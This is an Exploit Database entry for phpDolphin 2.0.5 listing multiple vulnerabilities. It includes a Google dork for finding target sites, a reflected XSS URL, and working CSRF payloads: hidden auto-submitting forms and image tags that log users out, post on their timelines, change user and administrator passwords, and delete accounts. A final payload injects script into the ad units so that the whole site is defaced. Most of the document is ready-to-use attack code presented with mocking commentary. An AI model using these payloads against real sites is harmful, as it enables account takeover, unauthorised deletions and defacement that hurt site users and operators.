phpDolphin 2.0.5 – Multiple Vulnerabilities

• Exploit Database
• 26 阅读

• 作者： WhiteCollarGroup
  日期： 2016-01-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39243/

• # Exploit Title: phpDolphin <= 2.0.5 CSRF
  # Google Dork: intext:"Powered by phpDolphin"
  # Date: January, 15th 2016
  # Exploit Author: WhiteCollarGroup
  # Vendor Homepage: http://phpdolphin.com
  # Version: 2.0.5
  
  XSS (Reflected)
  ===============
  
  > http://target.com/index.php?a=search&q=teste&filter=m"><h1>XSS</h1><noscript>
  CSRF
  ====
  
  We've found no protection against CSRF (Cross-site Request Forgery), which made possible to do any kind of act on a user (or admin) account.
  
  NO FORMS are secured at all. But we've included some interesting examples. These examples execute actions on the user account while he's visiting a special page prepared by us in any other server. He won't know anything while visiting, as nothing is shown. Let's start from the basic:
  
  Logging an user off
  ------------------
  
  ```
  <img src="http://localhost/dolphin/Script/index.php?a=feed&logout=1" width="1" height="1" />
  ```
  
  It's good to remember that if the user kept the "remember me" on, there are cookies called "username" and (MD5-encoded) "password".
  
  Posting on user's timeline
  --------------------------
  
  By changing the "group" input, it's also possible to post on groups.
  
  ```
  Lorem ipsum dolor sit amet :)<br/>
  Take a look on your profile ;)
  <form method="post" action="http://localhost/dolphin/Script/requests/post_message.php" target="hiddenframe" id="hackfrm">
  	<input type="hidden" name="message" value="HAXORED" />
  	<input type="hidden" name="privacy" value="1" />
  	<input type="hidden" name="group" value="" />
  	<input type="hidden" name="value" value="" />
  </form>
  <iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
  <script> document.getElementById('hackfrm').submit(); </script>
  ```
  
  Things can get a bit funnier.
  
  Changing user password
  ----------------------
  
  It's interesting that the change password form does NOT require the actual password. Just make sure "password" and "repeat_password" inputs have EXACTLY the same value.
  
  ```
  <form method="post" action="http://localhost/dolphin/Script/index.php?a=settings&b=security" target="hiddenframe" id="hackfrm">
  	<input type="hidden" name="password" value="hacked1" />
  	<input type="hidden" name="repeat_password" value="hacked1" />
  </form>
  <iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
  <script> document.getElementById('hackfrm').submit(); </script>
  ```
  
  Funny enough? Not?
  
  So let's change the administration password too. Of course this page must be accessed by the administrator.
  
  ```
  <form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=security" target="hiddenframe" id="hackfrm">
  	<input type="hidden" name="password" value="hacked1" />
  	<input type="hidden" name="repeat_password" value="hacked1" />
  </form>
  <iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
  <script> document.getElementById('hackfrm').submit(); </script>
  ```
  
  In order to open the admin panel, just visit `/index.php?a=admin`.
  
  Want to delete some user? Just find out the user ID (numeric). For that, just open the user profile, view source (Ctrl + U), find (Ctrl + F) "userid". You will find two attributes "data-userid". That's the numeric user ID.
  
  ```
  <img src="http://localhost/dolphin/Script/index.php?a=admin&b=users&delete=USER_ID_HERE" width="0" height="0" />
  ```
  
  Just want to mess everything up?
  
  Hacking site index
  ==================
  
  By adding Javascript code to one or more of the advertising units, we can block anyone's access to the site. This is our payload:
  
  ```
  <script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>
  ```
  
  And this is our code:
  
  ```
  <form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=manage_ads&m=i" target="hiddenframe" id="hackfrm">
  	<input type="hidden" name="ad1" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
  	<input type="hidden" name="ad2" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
  	<input type="hidden" name="ad3" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
  	<input type="hidden" name="ad4" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
  	<input type="hidden" name="ad5" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
  	<input type="hidden" name="ad6" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
  </form>
  <iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
  <script> document.getElementById('hackfrm').submit(); </script>
  ```
  
  Enough?
  
  Simply all forms are vulnerable to CSRF. These were just some.